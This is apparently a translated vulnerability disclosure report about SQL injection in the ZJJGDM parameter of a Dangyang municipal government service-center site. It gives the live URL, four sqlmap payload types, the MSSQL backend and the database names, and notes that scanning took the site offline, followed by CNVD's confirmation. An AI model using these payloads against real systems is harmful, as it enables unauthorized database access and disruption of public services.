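2015-04-07: Details reported to the vendor; awaiting vendor handling
2015-04-10: Vendor confirmed; details disclosed to the vendor only
2015-04-20: Details disclosed to core white hats and experts in related fields
2015-04-30: Details disclosed to regular white hats
2015-05-10: Details disclosed to intern white hats
2015-05-25: Details disclosed to the public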
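GET injection in a municipal people's government administrative service center
The issue is in the Dangyang Municipal People's Government Administrative Service Center: http://www.dyxz.gov.cn/application/wsbs/bszn/xzzhinanxiang.jsp?ZJJGDM=01115411X&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80 (GET)
After too many sqlmap runs, the site could no longer be accessed.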
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ZJJGDM (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ZJJGDM=01115411X' AND 6959=6959 AND 'zmyw'='zmyw&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: ZJJGDM=01115411X' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(120)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(88)+CHAR(112)+CHAR(79)+CHAR(82)+CHAR(88)+CHAR(67)+CHAR(98)+CHAR(69)+CHAR(68)+CHAR(74)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL,NULL-- &depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ZJJGDM=01115411X'; WAITFOR DELAY '0:0:5'--&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ZJJGDM=01115411X' WAITFOR DELAY '0:0:5'--&depName=%E5%BD%93%E9%98%B3%E5%B8%82%E7%BB%8F%E8%B4%B8%E5%B1%80
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] web_dangyang

Database: web_dangyang
[80 tables]
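Severity: High
Vulnerability Rank: 11
Confirmed: 2015-04-10 17:38
CNVD confirmed and reproduced the vulnerability as described. It has been passed via CNCERT to the Hubei branch center, which will follow up and coordinate with the organization that administers the website to handle it.
None yet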